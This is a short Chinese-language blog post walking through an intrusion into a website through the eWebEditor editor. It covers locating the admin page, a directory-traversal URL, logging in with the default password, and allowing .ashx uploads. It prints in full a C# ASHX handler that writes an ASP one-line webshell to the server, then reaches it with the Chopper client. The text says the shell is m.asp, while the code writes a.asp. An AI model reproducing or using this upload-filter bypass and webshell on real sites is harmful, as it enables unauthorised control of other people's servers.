前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,
正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。
用自动扫描脚本扫描出敏感目录
inc/ewebeditor/admin_login.asp
既然有ewebeditor编辑器那就尝试下编辑器 漏洞 把。
/inc/ewebeditor/admin/upload. asp ?id=6&d_viewmode=list&dir=
直接遍历来了。
使用默认密码登录ewebeditor后台,新添加样式,本想很容易解决。
上传免杀小马
加密 一句话也是一样的结果。
那我们怎么解决之个问题呢-
首先在编辑器样式的上传文件添加ashx后缀
在上传我们的Ashx马。
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));
file1.Write("<%eval request(\"a\")%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
接下来访问http://HdhCmsTestxxx测试数据/UploadFile/eWebEditor/201329112155838.ashx
会在eWebEditor生成一个m.asp文件(一句话木马)
用菜刀访问http://HdhCmsTest2cto测试数据 /UploadFile/eWebEditor/m.asp
就突破了
查看更多关于突破上传过滤一招,利用ashx - 网站安全 - 自学p的详细内容...